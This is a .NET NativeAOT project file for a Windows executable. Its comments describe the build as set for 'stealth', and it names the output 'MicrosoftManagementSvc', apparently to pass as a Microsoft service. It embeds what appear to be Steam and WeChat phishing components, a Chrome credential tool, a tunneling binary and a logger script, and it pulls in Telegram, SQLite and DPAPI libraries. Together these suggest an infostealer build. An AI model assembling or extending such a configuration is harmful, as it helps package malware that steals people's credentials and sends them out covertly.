<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0-windows</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>

    <!-- NativeAOT: compiles to native code (no MSIL, no .NET metadata) -> ~15MB -->
    <PublishAot>true</PublishAot>
    <SelfContained>true</SelfContained>
    <RuntimeIdentifier>win-x64</RuntimeIdentifier>
    <IlcOptimizationPreference>Size</IlcOptimizationPreference>
    
    <!-- Reflection is REQUIRED for Telegram.Bot and Newtonsoft.Json -->
    <IlcDisableReflection>false</IlcDisableReflection>
    <IlcGenerateStackTraceData>true</IlcGenerateStackTraceData>
    <TrimMode>partial</TrimMode>

    <!-- Size reduction & stealth -->
    <DebugType>None</DebugType>
    <DebugSymbols>false</DebugSymbols>
    <Deterministic>false</Deterministic>
    <InvariantGlobalization>true</InvariantGlobalization>
    <AssemblyName>MicrosoftManagementSvc</AssemblyName>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    
    <!-- WinForms dependency completely removed for NativeAOT support -->
  </PropertyGroup>

  <ItemGroup>
    <RdXmlFile Include="rd.xml" />
    <TrimmerRootAssembly Include="Newtonsoft.Json" />
    <TrimmerRootAssembly Include="Telegram.Bot" />
  </ItemGroup>

  <ItemGroup>
    <EmbeddedResource Include="SteamAlert.bin" />
    <EmbeddedResource Include="SteamLogin.bin" />
    <EmbeddedResource Include="chromelevator.bin" />
    <EmbeddedResource Include="core\wechat_phish.py" />
    <EmbeddedResource Include="websocket\discord_bot.py" />
    <EmbeddedResource Include="tools\bore.bin" />
    <EmbeddedResource Include="e_sqlite3.dll" />
    <EmbeddedResource Include="GlobalLogger.py" />
  </ItemGroup>
  
  <ItemGroup>
    <!-- Dependencies -->
    <PackageReference Include="Microsoft.Data.Sqlite" Version="8.0.0" />
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="System.Security.Cryptography.ProtectedData" Version="8.0.0" />
    <PackageReference Include="Telegram.Bot" Version="19.0.0" />
  </ItemGroup>

</Project>
